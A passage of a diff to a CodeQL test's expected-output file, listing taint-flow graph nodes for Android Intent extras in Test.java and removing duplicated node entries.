: Bundle [] : Number | | Test.java:603:38:603:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | -| Test.java:603:38:603:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | | Test.java:608:16:608:31 | (...)... : long[] | semmle.label | (...)... : long[] | | Test.java:608:24:608:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:609:4:609:6 | out [post update] : Intent [android.content.Intent.extras, ] : long[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : long[] | -| Test.java:609:4:609:6 | out [post update] : Intent [android.content.Intent.extras, ] : long[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : long[] | | Test.java:609:31:609:32 | in : long[] | semmle.label | in : long[] | | Test.java:610:9:610:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:610:21:610:41 | getIntent_extras(...) : Bundle [] : long[] | semmle.label | getIntent_extras(...) : Bundle [] : long[] | | Test.java:610:38:610:40 | out : Intent [android.content.Intent.extras, ] : long[] | semmle.label | out : Intent [android.content.Intent.extras, ] : long[] | -| Test.java:610:38:610:40 | out : Intent [android.content.Intent.extras, ] : long[] | semmle.label | out : Intent [android.content.Intent.extras, ] : long[] | | Test.java:615:14:615:27 | (...)... : Number | semmle.label | (...)... : Number | | Test.java:615:20:615:27 | source(...) : Object | semmle.label | source(...) 
: Object | | Test.java:616:4:616:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | -| Test.java:616:4:616:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | | Test.java:616:31:616:32 | in : Number | semmle.label | in : Number | | Test.java:617:9:617:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:617:21:617:41 | getIntent_extras(...) : Bundle [] : Number | semmle.label | getIntent_extras(...) : Bundle [] : Number | | Test.java:617:38:617:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | -| Test.java:617:38:617:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | | Test.java:622:15:622:29 | (...)... : int[] | semmle.label | (...)... : int[] | | Test.java:622:22:622:29 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:623:4:623:6 | out [post update] : Intent [android.content.Intent.extras, ] : int[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : int[] | -| Test.java:623:4:623:6 | out [post update] : Intent [android.content.Intent.extras, ] : int[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : int[] | | Test.java:623:31:623:32 | in : int[] | semmle.label | in : int[] | | Test.java:624:9:624:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:624:21:624:41 | getIntent_extras(...) : Bundle [] : int[] | semmle.label | getIntent_extras(...) 
: Bundle [] : int[] | | Test.java:624:38:624:40 | out : Intent [android.content.Intent.extras, ] : int[] | semmle.label | out : Intent [android.content.Intent.extras, ] : int[] | -| Test.java:624:38:624:40 | out : Intent [android.content.Intent.extras, ] : int[] | semmle.label | out : Intent [android.content.Intent.extras, ] : int[] | | Test.java:629:13:629:25 | (...)... : Number | semmle.label | (...)... : Number | | Test.java:629:18:629:25 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:630:4:630:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | -| Test.java:630:4:630:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | | Test.java:630:31:630:32 | in : Number | semmle.label | in : Number | | Test.java:631:9:631:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:631:21:631:41 | getIntent_extras(...) : Bundle [] : Number | semmle.label | getIntent_extras(...) : Bundle [] : Number | | Test.java:631:38:631:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | -| Test.java:631:38:631:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | | Test.java:636:17:636:33 | (...)... : float[] | semmle.label | (...)... : float[] | | Test.java:636:26:636:33 | source(...) : Object | semmle.label | source(...) 
: Object | | Test.java:637:4:637:6 | out [post update] : Intent [android.content.Intent.extras, ] : float[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : float[] | -| Test.java:637:4:637:6 | out [post update] : Intent [android.content.Intent.extras, ] : float[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : float[] | | Test.java:637:31:637:32 | in : float[] | semmle.label | in : float[] | | Test.java:638:9:638:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:638:21:638:41 | getIntent_extras(...) : Bundle [] : float[] | semmle.label | getIntent_extras(...) : Bundle [] : float[] | | Test.java:638:38:638:40 | out : Intent [android.content.Intent.extras, ] : float[] | semmle.label | out : Intent [android.content.Intent.extras, ] : float[] | -| Test.java:638:38:638:40 | out : Intent [android.content.Intent.extras, ] : float[] | semmle.label | out : Intent [android.content.Intent.extras, ] : float[] | | Test.java:643:15:643:29 | (...)... : Number | semmle.label | (...)... : Number | | Test.java:643:22:643:29 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:644:4:644:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | -| Test.java:644:4:644:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | | Test.java:644:31:644:32 | in : Number | semmle.label | in : Number | | Test.java:645:9:645:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:645:21:645:41 | getIntent_extras(...) : Bundle [] : Number | semmle.label | getIntent_extras(...) 
: Bundle [] : Number | | Test.java:645:38:645:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | -| Test.java:645:38:645:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | | Test.java:650:18:650:35 | (...)... : double[] | semmle.label | (...)... : double[] | | Test.java:650:28:650:35 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:651:4:651:6 | out [post update] : Intent [android.content.Intent.extras, ] : double[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : double[] | -| Test.java:651:4:651:6 | out [post update] : Intent [android.content.Intent.extras, ] : double[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : double[] | | Test.java:651:31:651:32 | in : double[] | semmle.label | in : double[] | | Test.java:652:9:652:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:652:21:652:41 | getIntent_extras(...) : Bundle [] : double[] | semmle.label | getIntent_extras(...) : Bundle [] : double[] | | Test.java:652:38:652:40 | out : Intent [android.content.Intent.extras, ] : double[] | semmle.label | out : Intent [android.content.Intent.extras, ] : double[] | -| Test.java:652:38:652:40 | out : Intent [android.content.Intent.extras, ] : double[] | semmle.label | out : Intent [android.content.Intent.extras, ] : double[] | | Test.java:657:16:657:31 | (...)... : Number | semmle.label | (...)... : Number | | Test.java:657:24:657:31 | source(...) : Object | semmle.label | source(...) 
: Object | | Test.java:658:4:658:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | -| Test.java:658:4:658:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | | Test.java:658:31:658:32 | in : Number | semmle.label | in : Number | | Test.java:659:9:659:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:659:21:659:41 | getIntent_extras(...) : Bundle [] : Number | semmle.label | getIntent_extras(...) : Bundle [] : Number | | Test.java:659:38:659:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | -| Test.java:659:38:659:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | | Test.java:664:16:664:31 | (...)... : char[] | semmle.label | (...)... : char[] | | Test.java:664:24:664:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:665:4:665:6 | out [post update] : Intent [android.content.Intent.extras, ] : char[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : char[] | -| Test.java:665:4:665:6 | out [post update] : Intent [android.content.Intent.extras, ] : char[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : char[] | | Test.java:665:31:665:32 | in : char[] | semmle.label | in : char[] | | Test.java:666:9:666:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:666:21:666:41 | getIntent_extras(...) : Bundle [] : char[] | semmle.label | getIntent_extras(...) 
: Bundle [] : char[] | | Test.java:666:38:666:40 | out : Intent [android.content.Intent.extras, ] : char[] | semmle.label | out : Intent [android.content.Intent.extras, ] : char[] | -| Test.java:666:38:666:40 | out : Intent [android.content.Intent.extras, ] : char[] | semmle.label | out : Intent [android.content.Intent.extras, ] : char[] | | Test.java:671:14:671:27 | (...)... : Number | semmle.label | (...)... : Number | | Test.java:671:20:671:27 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:672:4:672:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | -| Test.java:672:4:672:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | | Test.java:672:31:672:32 | in : Number | semmle.label | in : Number | | Test.java:673:9:673:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:673:21:673:41 | getIntent_extras(...) : Bundle [] : Number | semmle.label | getIntent_extras(...) : Bundle [] : Number | | Test.java:673:38:673:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | -| Test.java:673:38:673:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | | Test.java:678:16:678:31 | (...)... : byte[] | semmle.label | (...)... : byte[] | | Test.java:678:24:678:31 | source(...) : Object | semmle.label | source(...) 
: Object | | Test.java:679:4:679:6 | out [post update] : Intent [android.content.Intent.extras, ] : byte[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : byte[] | -| Test.java:679:4:679:6 | out [post update] : Intent [android.content.Intent.extras, ] : byte[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : byte[] | | Test.java:679:31:679:32 | in : byte[] | semmle.label | in : byte[] | | Test.java:680:9:680:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:680:21:680:41 | getIntent_extras(...) : Bundle [] : byte[] | semmle.label | getIntent_extras(...) : Bundle [] : byte[] | | Test.java:680:38:680:40 | out : Intent [android.content.Intent.extras, ] : byte[] | semmle.label | out : Intent [android.content.Intent.extras, ] : byte[] | -| Test.java:680:38:680:40 | out : Intent [android.content.Intent.extras, ] : byte[] | semmle.label | out : Intent [android.content.Intent.extras, ] : byte[] | | Test.java:685:14:685:27 | (...)... : Number | semmle.label | (...)... : Number | | Test.java:685:20:685:27 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:686:4:686:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | -| Test.java:686:4:686:6 | out [post update] : Intent [android.content.Intent.extras, ] : Number | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Number | | Test.java:686:31:686:32 | in : Number | semmle.label | in : Number | | Test.java:687:9:687:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:687:21:687:41 | getIntent_extras(...) : Bundle [] : Number | semmle.label | getIntent_extras(...) 
: Bundle [] : Number | | Test.java:687:38:687:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | -| Test.java:687:38:687:40 | out : Intent [android.content.Intent.extras, ] : Number | semmle.label | out : Intent [android.content.Intent.extras, ] : Number | | Test.java:692:19:692:37 | (...)... : boolean[] | semmle.label | (...)... : boolean[] | | Test.java:692:30:692:37 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:693:4:693:6 | out [post update] : Intent [android.content.Intent.extras, ] : boolean[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : boolean[] | -| Test.java:693:4:693:6 | out [post update] : Intent [android.content.Intent.extras, ] : boolean[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : boolean[] | | Test.java:693:31:693:32 | in : boolean[] | semmle.label | in : boolean[] | | Test.java:694:9:694:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:694:21:694:41 | getIntent_extras(...) : Bundle [] : boolean[] | semmle.label | getIntent_extras(...) : Bundle [] : boolean[] | | Test.java:694:38:694:40 | out : Intent [android.content.Intent.extras, ] : boolean[] | semmle.label | out : Intent [android.content.Intent.extras, ] : boolean[] | -| Test.java:694:38:694:40 | out : Intent [android.content.Intent.extras, ] : boolean[] | semmle.label | out : Intent [android.content.Intent.extras, ] : boolean[] | | Test.java:699:17:699:33 | (...)... : Boolean | semmle.label | (...)... : Boolean | | Test.java:699:26:699:33 | source(...) : Object | semmle.label | source(...) 
: Object | | Test.java:700:4:700:6 | out [post update] : Intent [android.content.Intent.extras, ] : Boolean | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Boolean | -| Test.java:700:4:700:6 | out [post update] : Intent [android.content.Intent.extras, ] : Boolean | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Boolean | | Test.java:700:31:700:32 | in : Boolean | semmle.label | in : Boolean | | Test.java:701:9:701:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:701:21:701:41 | getIntent_extras(...) : Bundle [] : Boolean | semmle.label | getIntent_extras(...) : Bundle [] : Boolean | | Test.java:701:38:701:40 | out : Intent [android.content.Intent.extras, ] : Boolean | semmle.label | out : Intent [android.content.Intent.extras, ] : Boolean | -| Test.java:701:38:701:40 | out : Intent [android.content.Intent.extras, ] : Boolean | semmle.label | out : Intent [android.content.Intent.extras, ] : Boolean | | Test.java:706:18:706:35 | (...)... : String[] | semmle.label | (...)... : String[] | | Test.java:706:28:706:35 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:707:4:707:6 | out [post update] : Intent [android.content.Intent.extras, ] : String[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String[] | -| Test.java:707:4:707:6 | out [post update] : Intent [android.content.Intent.extras, ] : String[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String[] | | Test.java:707:31:707:32 | in : String[] | semmle.label | in : String[] | | Test.java:708:9:708:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:708:21:708:41 | getIntent_extras(...) : Bundle [] : String[] | semmle.label | getIntent_extras(...) 
: Bundle [] : String[] | | Test.java:708:38:708:40 | out : Intent [android.content.Intent.extras, ] : String[] | semmle.label | out : Intent [android.content.Intent.extras, ] : String[] | -| Test.java:708:38:708:40 | out : Intent [android.content.Intent.extras, ] : String[] | semmle.label | out : Intent [android.content.Intent.extras, ] : String[] | | Test.java:713:16:713:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:713:24:713:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:714:4:714:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:714:4:714:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:714:31:714:32 | in : String | semmle.label | in : String | | Test.java:715:9:715:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:715:21:715:41 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:715:38:715:40 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:715:38:715:40 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:720:22:720:43 | (...)... : Serializable | semmle.label | (...)... : Serializable | | Test.java:720:36:720:43 | source(...) : Object | semmle.label | source(...) 
: Object | | Test.java:721:4:721:6 | out [post update] : Intent [android.content.Intent.extras, ] : Serializable | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Serializable | -| Test.java:721:4:721:6 | out [post update] : Intent [android.content.Intent.extras, ] : Serializable | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Serializable | | Test.java:721:31:721:32 | in : Serializable | semmle.label | in : Serializable | | Test.java:722:9:722:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:722:21:722:41 | getIntent_extras(...) : Bundle [] : Serializable | semmle.label | getIntent_extras(...) : Bundle [] : Serializable | | Test.java:722:38:722:40 | out : Intent [android.content.Intent.extras, ] : Serializable | semmle.label | out : Intent [android.content.Intent.extras, ] : Serializable | -| Test.java:722:38:722:40 | out : Intent [android.content.Intent.extras, ] : Serializable | semmle.label | out : Intent [android.content.Intent.extras, ] : Serializable | | Test.java:727:22:727:43 | (...)... : Parcelable[] | semmle.label | (...)... : Parcelable[] | | Test.java:727:36:727:43 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:728:4:728:6 | out [post update] : Intent [android.content.Intent.extras, ] : Parcelable[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Parcelable[] | -| Test.java:728:4:728:6 | out [post update] : Intent [android.content.Intent.extras, ] : Parcelable[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Parcelable[] | | Test.java:728:31:728:32 | in : Parcelable[] | semmle.label | in : Parcelable[] | | Test.java:729:9:729:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:729:21:729:41 | getIntent_extras(...) : Bundle [] : Parcelable[] | semmle.label | getIntent_extras(...) 
: Bundle [] : Parcelable[] | | Test.java:729:38:729:40 | out : Intent [android.content.Intent.extras, ] : Parcelable[] | semmle.label | out : Intent [android.content.Intent.extras, ] : Parcelable[] | -| Test.java:729:38:729:40 | out : Intent [android.content.Intent.extras, ] : Parcelable[] | semmle.label | out : Intent [android.content.Intent.extras, ] : Parcelable[] | | Test.java:734:20:734:39 | (...)... : Parcelable | semmle.label | (...)... : Parcelable | | Test.java:734:32:734:39 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:735:4:735:6 | out [post update] : Intent [android.content.Intent.extras, ] : Parcelable | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Parcelable | -| Test.java:735:4:735:6 | out [post update] : Intent [android.content.Intent.extras, ] : Parcelable | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Parcelable | | Test.java:735:31:735:32 | in : Parcelable | semmle.label | in : Parcelable | | Test.java:736:9:736:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:736:21:736:41 | getIntent_extras(...) : Bundle [] : Parcelable | semmle.label | getIntent_extras(...) : Bundle [] : Parcelable | | Test.java:736:38:736:40 | out : Intent [android.content.Intent.extras, ] : Parcelable | semmle.label | out : Intent [android.content.Intent.extras, ] : Parcelable | -| Test.java:736:38:736:40 | out : Intent [android.content.Intent.extras, ] : Parcelable | semmle.label | out : Intent [android.content.Intent.extras, ] : Parcelable | | Test.java:741:24:741:47 | (...)... : CharSequence[] | semmle.label | (...)... : CharSequence[] | | Test.java:741:40:741:47 | source(...) : Object | semmle.label | source(...) 
: Object | | Test.java:742:4:742:6 | out [post update] : Intent [android.content.Intent.extras, ] : CharSequence[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : CharSequence[] | -| Test.java:742:4:742:6 | out [post update] : Intent [android.content.Intent.extras, ] : CharSequence[] | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : CharSequence[] | | Test.java:742:31:742:32 | in : CharSequence[] | semmle.label | in : CharSequence[] | | Test.java:743:9:743:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:743:21:743:41 | getIntent_extras(...) : Bundle [] : CharSequence[] | semmle.label | getIntent_extras(...) : Bundle [] : CharSequence[] | | Test.java:743:38:743:40 | out : Intent [android.content.Intent.extras, ] : CharSequence[] | semmle.label | out : Intent [android.content.Intent.extras, ] : CharSequence[] | -| Test.java:743:38:743:40 | out : Intent [android.content.Intent.extras, ] : CharSequence[] | semmle.label | out : Intent [android.content.Intent.extras, ] : CharSequence[] | | Test.java:748:22:748:43 | (...)... : CharSequence | semmle.label | (...)... : CharSequence | | Test.java:748:36:748:43 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:749:4:749:6 | out [post update] : Intent [android.content.Intent.extras, ] : CharSequence | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : CharSequence | -| Test.java:749:4:749:6 | out [post update] : Intent [android.content.Intent.extras, ] : CharSequence | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : CharSequence | | Test.java:749:31:749:32 | in : CharSequence | semmle.label | in : CharSequence | | Test.java:750:9:750:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:750:21:750:41 | getIntent_extras(...) : Bundle [] : CharSequence | semmle.label | getIntent_extras(...) 
: Bundle [] : CharSequence | | Test.java:750:38:750:40 | out : Intent [android.content.Intent.extras, ] : CharSequence | semmle.label | out : Intent [android.content.Intent.extras, ] : CharSequence | -| Test.java:750:38:750:40 | out : Intent [android.content.Intent.extras, ] : CharSequence | semmle.label | out : Intent [android.content.Intent.extras, ] : CharSequence | | Test.java:755:16:755:31 | (...)... : Bundle | semmle.label | (...)... : Bundle | | Test.java:755:24:755:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:756:4:756:6 | out [post update] : Intent [android.content.Intent.extras, ] : Bundle | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Bundle | -| Test.java:756:4:756:6 | out [post update] : Intent [android.content.Intent.extras, ] : Bundle | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Bundle | | Test.java:756:31:756:32 | in : Bundle | semmle.label | in : Bundle | | Test.java:757:9:757:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:757:21:757:41 | getIntent_extras(...) : Bundle [] : Bundle | semmle.label | getIntent_extras(...) : Bundle [] : Bundle | | Test.java:757:38:757:40 | out : Intent [android.content.Intent.extras, ] : Bundle | semmle.label | out : Intent [android.content.Intent.extras, ] : Bundle | -| Test.java:757:38:757:40 | out : Intent [android.content.Intent.extras, ] : Bundle | semmle.label | out : Intent [android.content.Intent.extras, ] : Bundle | | Test.java:762:16:762:31 | (...)... : Intent | semmle.label | (...)... : Intent | | Test.java:762:24:762:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:763:10:763:11 | in : Intent | semmle.label | in : Intent | 
@@ -3386,22 +2623,18 @@ nodes | Test.java:769:24:769:52 | newBundleWithMapKey(...) : Bundle [] : String | semmle.label | newBundleWithMapKey(...) : Bundle [] : String | | Test.java:769:44:769:51 | source(...) : String | semmle.label | source(...) : String | | Test.java:770:4:770:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:770:4:770:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:770:18:770:19 | in : Bundle [] : String | semmle.label | in : Bundle [] : String | | Test.java:771:9:771:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:771:19:771:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:771:36:771:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:771:36:771:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:776:16:776:54 | (...)... : Bundle [] : Object | semmle.label | (...)... : Bundle [] : Object | | Test.java:776:24:776:54 | newBundleWithMapValue(...) : Bundle [] : Object | semmle.label | newBundleWithMapValue(...) : Bundle [] : Object | | Test.java:776:46:776:53 | source(...) : Object | semmle.label | source(...) 
: Object | | Test.java:777:4:777:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Object | -| Test.java:777:4:777:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Object | | Test.java:777:18:777:19 | in : Bundle [] : Object | semmle.label | in : Bundle [] : Object | | Test.java:778:9:778:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:778:21:778:41 | getIntent_extras(...) : Bundle [] : Object | semmle.label | getIntent_extras(...) : Bundle [] : Object | | Test.java:778:38:778:40 | out : Intent [android.content.Intent.extras, ] : Object | semmle.label | out : Intent [android.content.Intent.extras, ] : Object | -| Test.java:778:38:778:40 | out : Intent [android.content.Intent.extras, ] : Object | semmle.label | out : Intent [android.content.Intent.extras, ] : Object | | Test.java:783:16:783:31 | (...)... : Intent | semmle.label | (...)... : Intent | | Test.java:783:24:783:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:784:10:784:11 | in : Intent | semmle.label | in : Intent | 
@@ -3412,23 +2645,19 @@ nodes | Test.java:790:45:790:73 | newBundleWithMapKey(...) : Bundle [] : String | semmle.label | newBundleWithMapKey(...) : Bundle [] : String | | Test.java:790:65:790:72 | source(...) : String | semmle.label | source(...) : String | | Test.java:791:4:791:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:791:4:791:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:791:18:791:19 | in : Intent [android.content.Intent.extras, ] : String | semmle.label | in : Intent [android.content.Intent.extras, ] : String | | Test.java:792:9:792:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:792:19:792:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:792:36:792:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:792:36:792:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:797:16:797:76 | (...)... : Intent [android.content.Intent.extras, ] : Object | semmle.label | (...)... : Intent [android.content.Intent.extras, ] : Object | | Test.java:797:24:797:76 | newWithIntent_extras(...) : Intent [android.content.Intent.extras, ] : Object | semmle.label | newWithIntent_extras(...) : Intent [android.content.Intent.extras, ] : Object | | Test.java:797:45:797:75 | newBundleWithMapValue(...) : Bundle [] : Object | semmle.label | newBundleWithMapValue(...) : Bundle [] : Object | | Test.java:797:67:797:74 | source(...) : Object | semmle.label | source(...) 
: Object | | Test.java:798:4:798:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Object | -| Test.java:798:4:798:6 | out [post update] : Intent [android.content.Intent.extras, ] : Object | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : Object | | Test.java:798:18:798:19 | in : Intent [android.content.Intent.extras, ] : Object | semmle.label | in : Intent [android.content.Intent.extras, ] : Object | | Test.java:799:9:799:42 | getMapValue(...) | semmle.label | getMapValue(...) | | Test.java:799:21:799:41 | getIntent_extras(...) : Bundle [] : Object | semmle.label | getIntent_extras(...) : Bundle [] : Object | | Test.java:799:38:799:40 | out : Intent [android.content.Intent.extras, ] : Object | semmle.label | out : Intent [android.content.Intent.extras, ] : Object | -| Test.java:799:38:799:40 | out : Intent [android.content.Intent.extras, ] : Object | semmle.label | out : Intent [android.content.Intent.extras, ] : Object | | Test.java:804:16:804:31 | (...)... : Intent | semmle.label | (...)... : Intent | | Test.java:804:24:804:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:805:10:805:11 | in : Intent | semmle.label | in : Intent | 
@@ -3437,12 +2666,10 @@ nodes | Test.java:811:16:811:31 | (...)... : String | semmle.label | (...)... : String | | Test.java:811:24:811:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:812:4:812:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | -| Test.java:812:4:812:6 | out [post update] : Intent [android.content.Intent.extras, ] : String | semmle.label | out [post update] : Intent [android.content.Intent.extras, ] : String | | Test.java:812:33:812:34 | in : String | semmle.label | in : String | | Test.java:813:9:813:40 | getMapKey(...) | semmle.label | getMapKey(...) | | Test.java:813:19:813:39 | getIntent_extras(...) : Bundle [] : String | semmle.label | getIntent_extras(...) : Bundle [] : String | | Test.java:813:36:813:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | -| Test.java:813:36:813:38 | out : Intent [android.content.Intent.extras, ] : String | semmle.label | out : Intent [android.content.Intent.extras, ] : String | | Test.java:818:16:818:31 | (...)... : Intent | semmle.label | (...)... : Intent | | Test.java:818:24:818:31 | source(...) : Object | semmle.label | source(...) : Object | | Test.java:819:10:819:11 | in : Intent | semmle.label | in : Intent | 
